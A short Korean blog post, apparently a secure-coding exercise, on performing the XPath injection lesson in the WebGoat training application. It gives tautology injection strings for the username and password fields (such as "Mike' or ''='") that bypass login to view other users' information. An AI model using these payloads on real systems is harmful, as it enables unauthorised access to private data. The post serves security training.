4.XPATH Injection

CODEDRAGON Security/SecureCoding

반응형

   

   

XPath 삽입 공격 실습하기

다른 사람의 정보를 볼수 있도록 XPath삽입공격 수행하기

   

WegGoat을 실행하고, Injection Flaws에서 XPath Injection을 클릭

   

User Name과 Password 입력

User Name:

Mike

Password:

test123

  

   

XPath 삽입 공격

XPath 삽입 공격을 위해 User Name과 Password에 다음과 같이 입력한다.

User Name:

Mike' or ''='

Mike' or 'a'='a

Password:

' or ''='

' or ''='

   

반응형

'Security > SecureCoding' 카테고리의 다른 글

OWASP Top 10 2013  (0) 2016.01.02
1.Off-by-One Overflows - WebGoat  (0) 2015.12.23
1.Password Strength  (0) 2015.11.24
4.Remote Admin Access - WebGoat  (0) 2015.11.08
3.3Stage3: Bypass Data Layer Access Control - WebGoat  (0) 2015.11.03